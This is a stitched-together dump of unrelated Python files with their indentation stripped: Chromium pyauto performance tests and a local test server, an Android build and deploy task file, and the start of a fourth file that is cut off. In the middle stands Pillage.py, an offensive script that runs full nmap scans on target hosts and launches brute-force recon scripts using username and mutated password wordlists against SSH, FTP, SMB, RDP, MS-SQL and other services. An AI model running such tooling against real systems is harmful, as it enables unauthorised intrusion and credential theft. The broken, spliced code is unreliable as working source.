cookies = self.GetCookie(pyauto.GURL(url)) # window 0, tab 0
return '__pc_done=1' in cookies
self.assertTrue(
self.WaitUntil(
IsDone,
timeout=(self.MAX_ITERATION_SECONDS * iterations),
retry_sleep=1),
msg='Timed out waiting for page cycler test to complete.')
def CollectPagesAndTimes(self, url):
"""Collect the results from the cookies."""
pages, times = None, None
cookies = self.GetCookie(pyauto.GURL(url)) # window 0, tab 0
for cookie in cookies.split(';'):
if '__pc_pages' in cookie:
pages_str = cookie.split('=', 1)[1]
pages = pages_str.split(',')
elif '__pc_timings' in cookie:
times_str = cookie.split('=', 1)[1]
times = [float(t) for t in times_str.split(',')]
self.assertTrue(pages and times,
msg='Unable to find test results in cookies: %s' % cookies)
return pages, times
def IteratePageTimes(self, pages, times, iterations):
"""Regroup the times by the page.
Args:
pages: the list of pages
times: e.g. [page1_iter1, page2_iter1, ..., page1_iter2, page2_iter2, ...]
iterations: the number of times for each page
Yields:
(pageN, [pageN_iter1, pageN_iter2, ...])
"""
num_pages = len(pages)
num_times = len(times)
expected_num_times = num_pages * iterations
self.assertEqual(
expected_num_times, num_times,
msg=('num_times != num_pages * iterations: %s != %s * %s, times=%s' %
(num_times, num_pages, iterations, times)))
for i, page in enumerate(pages):
yield page, list(itertools.islice(times, i, None, num_pages))
def CheckPageTimes(self, pages, times, iterations):
"""Assert that all the times are greater than zero."""
failed_pages = []
for page, times in self.IteratePageTimes(pages, times, iterations):
failed_times = [t for t in times if t <= 0.0]
if failed_times:
failed_pages.append((page, failed_times))
if failed_pages:
self.fail('Pages with unexpected times: %s' % failed_pages)
def TrimTimes(self, times, percent):
"""Return a new list with |percent| number of times trimmed for each page.
Removes the largest and smallest values.
"""
iterations = len(times)
times = sorted(times)
num_to_trim = int(iterations * float(percent) / 100.0)
logging.debug('Before trimming %d: %s' % (num_to_trim, times))
a = num_to_trim / 2
b = iterations - (num_to_trim / 2 + num_to_trim % 2)
trimmed_times = times[a:b]
logging.debug('After trimming: %s', trimmed_times)
return trimmed_times
def ComputeFinalResult(self, pages, times, iterations):
"""The final score that is calculated is a geometric mean of the
arithmetic means of each page's load time, and we drop the
upper/lower 20% of the times for each page so they don't skew the
mean. The geometric mean is used for the final score because the
time range for any given site may be very different, and we don't
want slower sites to weight more heavily than others.
"""
self.CheckPageTimes(pages, times, iterations)
page_means = [
Mean(self.TrimTimes(times, percent=self.TRIM_PERCENT))
for _, times in self.IteratePageTimes(pages, times, iterations)]
return GeometricMean(page_means)
def StartUrl(self, test_name, iterations):
"""Return the URL to used to start the test.
Derived classes must implement this.
"""
    raise NotImplementedError
def RunPageCyclerTest(self, name, description):
"""Runs the specified PageCycler test.
Args:
name: the page cycler test name (corresponds to a directory or test file)
description: a string description for the test
"""
iterations = self._num_iterations
start_url = self.StartUrl(name, iterations)
self.NavigateToURL(start_url)
if self.use_auto:
self.WaitUntilStarted(start_url)
self.WaitUntilDone(start_url, iterations)
pages, times = self.CollectPagesAndTimes(start_url)
final_result = self.ComputeFinalResult(pages, times, iterations)
logging.info('%s page cycler final result: %f' %
(description, final_result))
self._OutputPerfGraphValue(description + '_PageCycler', final_result,
'milliseconds', graph_name='PageCycler')
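# Illustrative sketch (not part of the original suite): a worked example of the
# scoring pipeline in ComputeFinalResult above. Per page, the load times are
# sorted, the top/bottom TRIM_PERCENT are trimmed (as in TrimTimes), the
# remaining times are averaged, and the final score is the geometric mean of
# those per-page averages. The helper name and any input values are
# hypothetical; the module's Mean/GeometricMean helpers are replaced by inline
# math so the sketch stays self-contained.
def _example_page_cycler_score(page_times, trim_percent=20):
  """page_times maps page name -> list of per-iteration load times in ms."""
  import math
  page_means = []
  for times in page_times.values():
    iterations = len(times)
    ordered = sorted(times)
    num_to_trim = int(iterations * float(trim_percent) / 100.0)
    a = num_to_trim // 2
    b = iterations - (num_to_trim // 2 + num_to_trim % 2)
    trimmed = ordered[a:b]
    page_means.append(sum(trimmed) / float(len(trimmed)))
  # Geometric mean of the per-page arithmetic means.
  return math.exp(sum(math.log(m) for m in page_means) / len(page_means))
# With 10 iterations per page and trim_percent=20, two of the ten times are
# dropped per page: the single smallest and the single largest.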
class PageCyclerTest(BasePageCyclerTest):
"""Tests to run various page cyclers.
Environment Variables:
PC_NO_AUTO: if set, avoids automatically loading pages.
"""
def _PreReadDataDir(self, subdir):
"""This recursively reads all of the files in a given url directory.
The intent is to get them into memory before they are used by the benchmark.
Args:
subdir: a subdirectory of the page cycler data directory.
"""
def _PreReadDir(dirname, names):
for rfile in names:
with open(os.path.join(dirname, rfile)) as fp:
fp.read()
for root, dirs, files in os.walk(self.DataPath(subdir)):
_PreReadDir(root, files)
def StartUrl(self, test_name, iterations):
# Must invoke GetFileURLForPath before appending parameters to the URL,
# otherwise those parameters will get quoted.
start_url = self.GetFileURLForPath(self.DataPath(test_name), 'start.html')
start_url += '?iterations=%d' % iterations
if self.use_auto:
start_url += '&auto=1'
return start_url
def RunPageCyclerTest(self, dirname, description):
"""Runs the specified PageCycler test.
Args:
dirname: directory containing the page cycler test
description: a string description for the test
"""
self._PreReadDataDir('common')
self._PreReadDataDir(dirname)
super(PageCyclerTest, self).RunPageCyclerTest(dirname, description)
def testMoreJSFile(self):
self.RunPageCyclerTest('morejs', 'MoreJSFile')
def testAlexaFile(self):
self.RunPageCyclerTest('alexa_us', 'Alexa_usFile')
def testBloatFile(self):
self.RunPageCyclerTest('bloat', 'BloatFile')
def testDHTMLFile(self):
self.RunPageCyclerTest('dhtml', 'DhtmlFile')
def testIntl1File(self):
self.RunPageCyclerTest('intl1', 'Intl1File')
def testIntl2File(self):
self.RunPageCyclerTest('intl2', 'Intl2File')
def testMozFile(self):
self.RunPageCyclerTest('moz', 'MozFile')
def testMoz2File(self):
self.RunPageCyclerTest('moz2', 'Moz2File')
class MemoryTest(BasePerfTest):
"""Tests to measure memory consumption under different usage scenarios."""
def ExtraChromeFlags(self):
"""Launches Chrome with custom flags.
Returns:
A list of extra flags to pass to Chrome when it is launched.
"""
# Ensure Chrome assigns one renderer process to each tab.
return super(MemoryTest, self).ExtraChromeFlags() + ['--process-per-tab']
def _RecordMemoryStats(self, description, when, duration):
"""Outputs memory statistics to be graphed.
Args:
description: A string description for the test. Should not contain
spaces. For example, 'MemCtrl'.
when: A string description of when the memory stats are being recorded
during test execution (since memory stats may be recorded multiple
times during a test execution at certain "interesting" times). Should
not contain spaces.
duration: The number of seconds to sample data before outputting the
memory statistics.
"""
mem = self.GetMemoryStatsChromeOS(duration)
measurement_types = [
('gem_obj', 'GemObj'),
('gtt', 'GTT'),
('mem_free', 'MemFree'),
('mem_available', 'MemAvail'),
('mem_shared', 'MemShare'),
('mem_cached', 'MemCache'),
('mem_anon', 'MemAnon'),
('mem_file', 'MemFile'),
('mem_slab', 'MemSlab'),
('browser_priv', 'BrowPriv'),
('browser_shared', 'BrowShar'),
('gpu_priv', 'GpuPriv'),
('gpu_shared', 'GpuShar'),
('renderer_priv', 'RendPriv'),
('renderer_shared', 'RendShar'),
]
for type_key, type_string in measurement_types:
if type_key not in mem:
continue
self._OutputPerfGraphValue(
'%s-Min%s-%s' % (description, type_string, when),
mem[type_key]['min'], 'KB', '%s-%s' % (description, type_string))
self._OutputPerfGraphValue(
'%s-Max%s-%s' % (description, type_string, when),
mem[type_key]['max'], 'KB', '%s-%s' % (description, type_string))
self._OutputPerfGraphValue(
'%s-End%s-%s' % (description, type_string, when),
mem[type_key]['end'], 'KB', '%s-%s' % (description, type_string))
def _RunTest(self, tabs, description, duration):
"""Runs a general memory test.
Args:
tabs: A list of strings representing the URLs of the websites to open
during this test.
description: A string description for the test. Should not contain
spaces. For example, 'MemCtrl'.
duration: The number of seconds to sample data before outputting memory
statistics.
"""
self._RecordMemoryStats(description, '0Tabs0', duration)
for iteration_num in xrange(2):
for site in tabs:
self.AppendTab(pyauto.GURL(site))
self._RecordMemoryStats(description,
'%dTabs%d' % (len(tabs), iteration_num + 1),
duration)
for _ in xrange(len(tabs)):
self.CloseTab(tab_index=1)
self._RecordMemoryStats(description, '0Tabs%d' % (iteration_num + 1),
duration)
def testOpenCloseTabsControl(self):
"""Measures memory usage when opening/closing tabs to about:blank."""
tabs = ['about:blank'] * 10
self._RunTest(tabs, 'MemCtrl', 15)
def testOpenCloseTabsLiveSites(self):
"""Measures memory usage when opening/closing tabs to live sites."""
tabs = [
'http://www.google.com/gmail',
'http://www.google.com/calendar',
'http://www.google.com/plus',
'http://www.google.com/youtube',
'http://www.nytimes.com',
'http://www.cnn.com',
'http://www.facebook.com/zuck',
'http://www.techcrunch.com',
'http://www.theverge.com',
'http://www.yahoo.com',
]
# Log in to a test Google account to make connections to the above Google
# websites more interesting.
self._LoginToGoogleAccount()
self._RunTest(tabs, 'MemLive', 20)
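# Illustrative note (not part of the original suite): with the naming scheme in
# _RecordMemoryStats above, testOpenCloseTabsControl (description 'MemCtrl',
# ten about:blank tabs) produces perf values such as 'MemCtrl-MinMemFree-0Tabs0'
# before any tabs are opened and 'MemCtrl-MaxMemFree-10Tabs1' after the first
# round of tabs, all attached to the 'MemCtrl-MemFree' graph.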
class PerfTestServerRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""Request handler for the local performance test server."""
def _IgnoreHandler(self, unused_args):
"""A GET request handler that simply replies with status code 200.
Args:
unused_args: A dictionary of arguments for the current GET request.
The arguments are ignored.
"""
self.send_response(200)
self.end_headers()
def _CreateFileOfSizeHandler(self, args):
"""A GET handler that creates a local file with the specified size.
Args:
args: A dictionary of arguments for the current GET request. Must
contain 'filename' and 'mb' keys that refer to the name of the file
to create and its desired size, respectively.
"""
megabytes = None
filename = None
try:
megabytes = int(args['mb'][0])
filename = args['filename'][0]
except (ValueError, KeyError, IndexError), e:
logging.exception('Server error creating file: %s', e)
assert megabytes and filename
with open(os.path.join(self.server.docroot, filename), 'wb') as f:
f.write('X' * 1024 * 1024 * megabytes)
self.send_response(200)
self.end_headers()
def _DeleteFileHandler(self, args):
"""A GET handler that deletes the specified local file.
Args:
args: A dictionary of arguments for the current GET request. Must
contain a 'filename' key that refers to the name of the file to
delete, relative to the server's document root.
"""
filename = None
try:
filename = args['filename'][0]
except (KeyError, IndexError), e:
logging.exception('Server error deleting file: %s', e)
assert filename
try:
os.remove(os.path.join(self.server.docroot, filename))
except OSError, e:
logging.warning('OS error removing file: %s', e)
self.send_response(200)
self.end_headers()
def _StartUploadHandler(self, args):
"""A GET handler to serve a page that uploads the given amount of data.
When the page loads, the specified amount of data is automatically
uploaded to the same local server that is handling the current request.
Args:
args: A dictionary of arguments for the current GET request. Must
contain an 'mb' key that refers to the size of the data to upload.
"""
megabytes = None
try:
megabytes = int(args['mb'][0])
except (ValueError, KeyError, IndexError), e:
logging.exception('Server error starting upload: %s', e)
assert megabytes
script = """
<html>
<head>
<script type='text/javascript'>
function startUpload() {
var megabytes = %s;
var data = Array((1024 * 1024 * megabytes) + 1).join('X');
var boundary = '***BOUNDARY***';
var xhr = new XMLHttpRequest();
xhr.open('POST', 'process_upload', true);
xhr.setRequestHeader(
'Content-Type',
'multipart/form-data; boundary="' + boundary + '"');
xhr.setRequestHeader('Content-Length', data.length);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
document.getElementById('upload_result').innerHTML =
xhr.responseText;
}
};
var body = '--' + boundary + '\\r\\n';
body += 'Content-Disposition: form-data;' +
'file_contents=' + data;
xhr.send(body);
}
</script>
</head>
<body onload="startUpload();">
<div id='upload_result'>Uploading...</div>
</body>
</html>
""" % megabytes
self.send_response(200)
self.end_headers()
self.wfile.write(script)
def _ProcessUploadHandler(self, form):
"""A POST handler that discards uploaded data and sends a response.
Args:
form: A dictionary containing posted form data, as returned by
urlparse.parse_qs().
"""
upload_processed = False
file_size = 0
if 'file_contents' in form:
file_size = len(form['file_contents'][0])
upload_processed = True
self.send_response(200)
self.end_headers()
if upload_processed:
self.wfile.write('Upload complete (%d bytes)' % file_size)
else:
self.wfile.write('No file contents uploaded')
GET_REQUEST_HANDLERS = {
'create_file_of_size': _CreateFileOfSizeHandler,
'delete_file': _DeleteFileHandler,
'start_upload': _StartUploadHandler,
'favicon.ico': _IgnoreHandler,
}
POST_REQUEST_HANDLERS = {
'process_upload': _ProcessUploadHandler,
}
def translate_path(self, path):
"""Ensures files are served from the given document root.
Overridden from SimpleHTTPServer.SimpleHTTPRequestHandler.
"""
path = urlparse.urlparse(path)[2]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words) # Remove empty strings from |words|.
path = self.server.docroot
for word in words:
_, word = os.path.splitdrive(word)
_, word = os.path.split(word)
if word in (os.curdir, os.pardir):
continue
path = os.path.join(path, word)
return path
def do_GET(self):
"""Processes a GET request to the local server.
Overridden from SimpleHTTPServer.SimpleHTTPRequestHandler.
"""
split_url = urlparse.urlsplit(self.path)
base_path = split_url[2]
if base_path.startswith('/'):
base_path = base_path[1:]
args = urlparse.parse_qs(split_url[3])
if base_path in self.GET_REQUEST_HANDLERS:
self.GET_REQUEST_HANDLERS[base_path](self, args)
else:
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
"""Processes a POST request to the local server.
Overridden from SimpleHTTPServer.SimpleHTTPRequestHandler.
"""
form = urlparse.parse_qs(
self.rfile.read(int(self.headers.getheader('Content-Length'))))
path = urlparse.urlparse(self.path)[2]
if path.startswith('/'):
path = path[1:]
if path in self.POST_REQUEST_HANDLERS:
self.POST_REQUEST_HANDLERS[path](self, form)
else:
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write('No handler for POST request "%s".' % path)
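  # Illustrative note (not part of the original handler): translate_path above
  # resolves every request path against the server's docroot and drops drive
  # letters, '.' and '..' components, so a request for '/../../etc/passwd'
  # resolves to <docroot>/etc/passwd rather than escaping the document root.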
class ThreadedHTTPServer(SocketServer.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
def __init__(self, server_address, handler_class):
BaseHTTPServer.HTTPServer.__init__(self, server_address, handler_class)
class PerfTestServer(object):
"""Local server for use by performance tests."""
def __init__(self, docroot):
"""Initializes the performance test server.
Args:
docroot: The directory from which to serve files.
"""
# The use of 0 means to start the server on an arbitrary available port.
self._server = ThreadedHTTPServer(('', 0),
PerfTestServerRequestHandler)
self._server.docroot = docroot
self._server_thread = threading.Thread(target=self._server.serve_forever)
def Run(self):
"""Starts the server thread."""
self._server_thread.start()
def ShutDown(self):
"""Shuts down the server."""
self._server.shutdown()
self._server_thread.join()
def GetPort(self):
"""Identifies the port number to which the server is currently bound.
Returns:
The numeric port number to which the server is currently bound.
"""
return self._server.server_address[1]
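# Illustrative sketch (not part of the original suite): minimal standalone use
# of PerfTestServer, mirroring what FileUploadDownloadTest.setUp/tearDown do
# with a temporary docroot. The helper name is hypothetical; shutil/tempfile
# are used instead of the module's pyauto_utils helpers to keep the sketch
# self-contained.
def _example_run_perf_test_server():
  """Starts a PerfTestServer on a scratch docroot, prints its port, stops it."""
  import shutil
  import tempfile
  docroot = tempfile.mkdtemp()
  server = PerfTestServer(docroot)
  server.Run()
  try:
    print('PerfTestServer listening on port %d' % server.GetPort())
  finally:
    server.ShutDown()
    shutil.rmtree(docroot, ignore_errors=True)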
if __name__ == '__main__':
pyauto_functional.Main()
|
Pillage.py
|
#!/usr/bin/python
import argparse, time, sys, os
import subprocess, multiprocessing
class Pillage(object):
def __init__(self, directoryName="pillageResults", userList="wordlists/users.txt", passList="wordlists/mutatedMega.txt"):
self.banner()
self.parseArgs()
self.userList=userList
self.passList=passList
self.createDir(directoryName)
self.pillageHosts()
def parseArgs(self):
parser = argparse.ArgumentParser(prog='Analyzes a group of hosts and enumerates interesting info', add_help=True)
parser.add_argument('hostfile', help='host range to scan')
args = parser.parse_args()
self.hosts=self.analyzeHostfile(args.hostfile)
def addProcess(self, method, arguments):
p = multiprocessing.Process(target=method, args=(arguments,))
p.start()
def sshEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected SSH on " + host + ":" + port
script = "python sshRecon.py {} {} {} {}".format(host, port, self.userList, self.passList)
subprocess.call(script, shell=True)
def ftpEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected FTP on " + host + ":" + port
script = "python ftpRecon.py {} {} {} {}".format(host, port, self.userList, self.passList)
subprocess.call(script, shell=True)
    #Http and Https use the same handler; only the protocol argument changes
def httpEnum(self, args):
host=args[0]
port=args[1]
protocol=args[2]
print "INFO: Detected webapp on " + host + ":" + port
script = "python webRecon.py {} {} {} {} {}".format(host, port, protocol, self.userList, self.passList)
subprocess.call(script, shell=True)
def dnsEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected DNS on " + host + ":" + port
script = "python dnsRecon.py {} {}".format(host, port)
subprocess.call(script, shell=True)
def msSqlEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected MS-SQL on " + host + ":" + port
script = "python msSqlRecon.py {} {} {} {}".format(host, port, self.userList, self.passList)
subprocess.call(script, shell=True)
    def snmpEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected snmp on " + host + ":" + port
script = "python snmpRecon.py {} {}".format(host, port)
subprocess.call(script, shell=True)
def smtpEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected smtp on " + host + ":" + port
script = "python smtpRecon.py {} {} {} {}".format(host, port, self.userList, self.passList)
subprocess.call(script, shell=True)
def smbEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected smb on " + host + ":" + port
script = "python smbRecon.py {} {} {} {}".format(host, port, self.userList, self.passList)
subprocess.call(script, shell=True)
def rdpEnum(self, args):
host=args[0]
port=args[1]
print "INFO: Detected rdp on " + host + ":" + port
script = "python rdpRecon.py {} {} {} {}".format(host, port, self.userList, self.passList)
subprocess.call(script, shell=True)
def pillageHosts(self):
for host in self.hosts:
tcpServices, udpServices = self.scanHost(host)
for service in tcpServices:
port=service[0].split('/')[0]
serv=service[2]
if serv == 'ssh':
self.addProcess(self.sshEnum, [host, port])
elif serv == 'ftp':
self.addProcess(self.ftpEnum, [host, port])
elif serv == 'dns':
self.addProcess(self.dnsEnum, [host, port])
elif 'https' in serv or 'http' in serv:
protocol = 'http'
if 'ssl' in serv or 'https' in serv:
                        protocol = 'https'
self.addProcess(self.httpEnum, [host, port, protocol])
elif serv == 'msSql' or serv == 'ms-sql-s' or serv == 'ms-sql':
self.addProcess(self.msSqlEnum, [host, port])
elif serv == 'smtp':
self.addProcess(self.smtpEnum, [host, port])
elif serv == 'snmp':
self.addProcess(self.snmpEnum, [host, port])
elif serv == 'smb':
self.addProcess(self.smbEnum, [host, port])
elif serv == 'rdp' or serv == ' microsoft-rdp' or serv == 'ms-wbt-server' or serv == 'ms-term-serv':
self.addProcess(self.rdpEnum, [host, port])
else:
print "INFO: no module found for %s" % (serv)
print "INFO: TCP/UDP Nmap scans completed for " + host
    #TODO: iterate through UDP services once any modules support UDP
def scanHost(self, host):
print "INFO: Running general TCP/UDP nmap scans for " + host
fullPath="{}/{}".format(self.dirPath,str(host))
TCPSCAN = "nmap -vv -Pn -A -sC -sV -T 4 -p- -oN '%s.nmap' -oX '%s.xml' %s" % (fullPath, fullPath, host)
results = subprocess.check_output(TCPSCAN, shell=True)
# None of the modules support UDP at this time, so I am omitting the scan and results.
#UDPSCAN = "nmap -vv -Pn -A -sC -sV -sU -T 4 --top-ports 500 -oN '%sU.nmap' -oX '%sU.xml' %s" % (fullPath, fullPath, host)
udpresults= []#subprocess.check_output(UDPSCAN, shell=True)
return self.getInterestingTCP(host, results), self.getInterestingUDP(host, udpresults)
def getInterestingTCP(self, host, results):
tcpServices=[]
for line in iter(results.splitlines()):
words=line.split()
try:
if words and words[1] == "open" and "/tcp" in words[0]:
tcpServices.append(words)
except:
#weird formatting...
continue
return tcpServices
#Could implement
def getInterestingUDP(self,host, results):
return []
def recordResults(self, host, results):
filepath="{}/{}Results.txt".format(self.dirPath,str(host))
with open(filepath, "a") as myfile:
myfile.write(results)
def analyzeHostfile(self, hostfile):
try:
with open(hostfile) as f:
allHosts=[]
for line in f:
if line[0]=='#':
pass
else:
if len(line.split())==1:
allHosts.append(line.strip())
else:
raise
return allHosts
except:
print "Invalid host file formatting!"
sys.exit()
def createDir(self, directory):
self.dirPath=directory
if not os.path.exists(directory):
os.makedirs(directory)
def banner(self):
print "############################################################"
print "#### PILLAGE ####"
print "#### Kicking Hosts and Taking Services ####"
print "############################################################"
if __name__ == "__main__":
pillager = Pillage()
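#Illustrative note (not part of the original script): getInterestingTCP keeps
#nmap normal-output lines whose first column ends in "/tcp" and whose second
#column is "open". A (hypothetical) scan line such as
#  22/tcp   open  ssh     OpenSSH 7.2p2
#splits into ['22/tcp', 'open', 'ssh', 'OpenSSH', '7.2p2'], from which
#pillageHosts reads the port as words[0].split('/')[0] and the service name
#as words[2].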
|
android_collection.py
|
import multiprocessing
import os
from time import sleep
import re
from invoke import task
from invoke_collections import kivy_collection
from invoke_collections.utils import tprint, fprint, iprint
@task
def check_genymotion(ctx):
"""
Checks if genymotion was installed properly
"""
genymotion_path = ctx.get('genymotion_path')
if not genymotion_path:
raise RuntimeError("Genymotion path is not set. Set 'genymotion_path' in invoke.json")
if os.path.exists(genymotion_path):
print "Genymotion path exists. Good... Checking player..."
if os.path.exists(os.path.join(genymotion_path, 'player')):
print "Player found."
else:
fprint("Genymotion path does not contain player binary and seems not to be genymotion installation")
else:
fprint("Genymotion path does not exist. Set correct one in invoke.json")
@task
def projects_build(ctx):
"""
Build third party android projects like google play services and facebook SDK
"""
tprint("Building google play services project...")
ctx.run("%s update project -t 1 -p ./google-play-services_lib --subprojects" % ctx['sdk_manager'])
ctx.run("%s update project -t 1 -p ./facebook-android-sdk/facebook --subprojects" % ctx['sdk_manager'])
@task(
help={
"profile": "Build profile to use. Default: empty string meaning google play"
}
)
def patch(ctx, profile=''):
"""
Patch p4a android project with the updated versions of files, placed in patch/ directory
"""
import buildozer
buildo = buildozer.Buildozer()
buildo.config_profile = profile
buildo._merge_config_profile()
buildozer_config = buildo.config
package_name = buildozer_config.get('app', 'package.name')
dist_path = ".buildozer/android/platform/build/dists/%s" % package_name
if not os.path.exists(dist_path):
fprint("Android project directory %s does not exist, won't patch" % dist_path)
return False
tprint("Patching android project: %s" % dist_path)
ctx.run(
"rsync -rav ./patch/android/%s/* "
"%s" % (package_name, dist_path)
)
tprint("Patching done")
return True
@task(
pre=[check_genymotion],
)
def genymotion(ctx):
"""
Start emulator. Device id is taken from invoke.json
"""
tprint("Starting genymotion device...")
print "Known virtual machines:"
devices = ctx.run("VBoxManage list vms")
devices = re.split('\\n|\\t', devices.stdout)
pattern = re.compile(r"\"(.*?)\" \{(.*?)\}")
device_names = {}
for line in devices:
if not line:
continue
match = pattern.search(line)
if match:
device_names[match.groups()[1]] = match.groups()[0]
else:
print "Can't parse machine name: %s" % line
try:
if not ctx['genymotion_device_id'] in device_names:
fprint("Genymotion device %s is not found in installed genymotion machines." %
(ctx['genymotion_device_id'],))
else:
iprint("Starting %s..." % device_names[ctx['genymotion_device_id']])
command = "%(genymotion)s --vm-name %(device_id)s&" % {
"genymotion": os.path.join(ctx['genymotion_path'], 'player'),
"device_id": ctx['genymotion_device_id']
}
process = multiprocessing.Process(target=ctx.run, args=(command,))
process.daemon = True
process.start()
            print 'Waiting for genymotion to load'
sleep(20)
except KeyError:
fprint("Genymotion device is not set. Set 'genymotion_device_id' in invoke.json")
@task(
help={
"debug": "List only debug apks"
}
)
def apks(ctx, debug=True):
"""
Print information about located apks in the bin/ directory
"""
import buildozer
buildozer_config = buildozer.Buildozer().config
if debug:
pattern = re.compile(r"%s\-(?P<version>\d+\.\d+\.\d+)\-debug\.apk$" % buildozer_config.get('app', 'title'))
else:
pattern = re.compile(r"%s\-(?P<version>\d+\.\d+\.\d+)\-release\.apk$" % buildozer_config.get('app', 'title'))
candidate_apks = {}
for path in sorted(os.listdir(os.path.abspath('bin'))):
match = pattern.search(path)
if match:
version = match.groups()[0]
candidate_apks[version] = path
print version
print "%s apks" % len(candidate_apks)
@task
def ensure_devices(ctx):
"""
Check if genymotion emulator is running
"""
tprint("Start devices...")
ds = devices(ctx)
if not ds:
genymotion(ctx)
ds = devices(ctx)
if not ds:
fprint("Tried to start emulator, still no devices found. Something is wrong.")
exit(1)
iprint("Found %s devices" % len(ds))
@task(
pre=[ensure_devices],
help={
"profile": "Profile to use. Default: empty string, meaning google play",
"debug": "Install debug apk"
}
)
def install(ctx, profile=None, debug=False):
"""
Install the latest available apk into currently available device (emulator or real device)
"""
import buildozer
profile = profile or ""
buildo = buildozer.Buildozer()
buildo.config_profile = profile
buildo._merge_config_profile()
buildozer_config = buildo.config
name = buildozer_config.get('app', 'title').replace(" ", "")
print "Check if already installed..."
installed_packages = ctx.run("%(adb)s shell pm list packages %(domain)s.%(name)s" % {
"adb": ctx['adb'],
"domain": buildozer_config.get('app', 'package.domain'),
"name": buildozer_config.get('app', 'package.name')
}).stdout
if installed_packages:
print "Found old version, uninstall..."
ctx.run('%(adb)s uninstall %(domain)s.%(name)s' % {
"adb": ctx['adb'],
"domain": buildozer_config.get('app', 'package.domain'),
"name": buildozer_config.get('app', 'package.name')
})
else:
print "Not installed, pass..."
if debug:
filename = "%s-%s-debug.apk" % (name, buildo.get_version())
else:
filename = "%s-%s-release.apk" % (name, buildo.get_version())
ctx.run('%(adb)s install -r %(apk_path)s' % {
'adb': ctx['adb'],
'apk_path': os.path.join(os.path.abspath('bin'), filename)
})
@task(
default=True,
pre=[ensure_devices],
help={
"profile": "Profile to use. Default: empty string, meaning google play",
}
)
def start(ctx, profile=None, logcat=False):
"""
Start kognitivo inside the current device (emulator or real device)
"""
import buildozer
profile = profile or ""
buildo = buildozer.Buildozer()
buildozer_config = buildo.config
buildo.config_profile = profile
buildo._merge_config_profile()
tprint("Starting %s on android" % buildozer_config.get('app', 'package.name'))
ctx.run("%(adb)s shell input keyevent 82" % {
"adb": ctx["adb"],
})
ctx.run("%(adb)s shell am start -n %(package_id)s/org.kivy.android.PythonActivity" % {
"adb": ctx["adb"],
"package_id": "%s.%s" % (buildozer_config.get('app', 'package.domain'),
buildozer_config.get('app', 'package.name'))
})
if logcat:
log(ctx, all=True)
@task
def devices(ctx):
"""
List currently available devices
"""
tprint("Checking devices...")
ds = ctx.run('%(adb)s devices' % {
'adb': ctx['adb'],
})
ds = re.split('\\n', ds.stdout)
serial_pattern = re.compile(r"([0-9a-z]{8})")
ip_pattern = re.compile(r"(\d+\.\d+\.\d+\.\d+):\d+")
ds_names = []
for i, line in enumerate(ds):
match = serial_pattern.search(line)
if match and i != 0:
print "Serial device %s" % match.groups()[0]
ds_names.append(match.groups()[0])
match = ip_pattern.search(line)
if match:
print "IP device %s" % match.groups()[0]
ds_names.append(match.groups()[0])
if not ds_names:
print "No devices found..."
else:
return ds_names
@task(
pre=[ensure_devices],
help={
"all": "Log everything, no filtering for log coming from python activity only"
}
)
def log(ctx, all=False):
"""
Start logging from current device (emulator or real device)
"""
tprint("Starting logcat...")
try:
if all:
print "Capturing all..."
ctx.run("%(adb)s logcat -c; ADB=%(adb)s logcat-color --config=logcat-color" % {
"adb": ctx['adb']
}, pty=True)
else:
print "Capturing python only..."
ctx.run("%(adb)s logcat -c; ADB=%(adb)s logcat-color --config=logcat-color| egrep 'python'" % {
"adb": ctx['adb']
}, pty=True)
except KeyboardInterrupt:
exit(0)
@task(
pre=[projects_build, kivy_collection.po, kivy_collection.mo],
help={
"deploy": "Immediately install and run on the currently availble device",
"logcat": "Start logging after installation is finished and the application is started"
}
)
def debug(ctx, deploy=True, logcat=False):
"""
Create debug apk
"""
patched = patch(ctx)
if deploy:
ensure_devices(ctx)
tprint("Building and installing android in debug mode...")
ctx.run("buildozer android debug", pty=True)
if not patched:
patch(ctx)
ctx.run("buildozer android debug", pty=True)
if deploy:
install(ctx, profile='', debug=True)
start(ctx, profile='')
if logcat:
log(ctx, all=True)
@task(
pre=[projects_build, kivy_collection.po, kivy_collection.mo],
help={
"deploy": "Immediately install and run on the currently availble device",
"logcat": "Start logging after installation is finished and the application is started"
}
)
def release(ctx, deploy=True, logcat=False):
"""
Create release apk for google play
"""
patched = patch(ctx)
if deploy:
ensure_devices(ctx)
tprint("Building and installing android in release mode...")
os.environ['P4A_RELEASE_KEYSTORE'] = ctx['keystore']
os.environ['P4A_RELEASE_KEYALIAS'] = ctx['keystore_alias']
os.environ['P4A_RELEASE_KEYSTORE_PASSWD'] = ctx['keystore_password']
os.environ['P4A_RELEASE_KEYALIAS_PASSWD'] = ctx['keystore_password']
ctx.run("buildozer android release", pty=True)
if not patched:
patch(ctx)
ctx.run("buildozer android release", pty=True)
if deploy:
install(ctx, profile='release', debug=False)
start(ctx, profile='release')
if logcat:
log(ctx, all=True)
@task
def manager(ctx):
"""
Start android SDK manager
"""
tprint("Starting android sdk manager...")
process = multiprocessing.Process(target=ctx.run, args=(ctx['sdk_manager'],))
process.daemon = True
process.start()
sleep(5)
@task
def avd_manager(ctx):
"""
    Start android AVD (emulator) manager
"""
tprint("Starting android emulators manager...")
process = multiprocessing.Process(target=ctx.run, args=(ctx['sdk_manager'] + " avd",))
process.daemon = True
process.start()
sleep(5)
@task
def adb_kill(ctx):
"""
    Kills the running ADB daemon, sometimes useful if you get "port is in use" errors
"""
ctx.run("%s kill-server" % ctx['adb'])
@task
def adb_start(ctx):
"""
    Starts the ADB daemon, sometimes useful if you get "port is in use" errors
"""
ctx.run("%s start-server" % ctx['adb'])
|
generate_env_map.py
|
import multiprocessing
from utils.img_utils import crop_map_image
from utils.utils import log, AttrDict
def _generate_env_map_worker(make_env_func, return_dict):
map_img = coord_limits = None
env = make_env_func()
try:
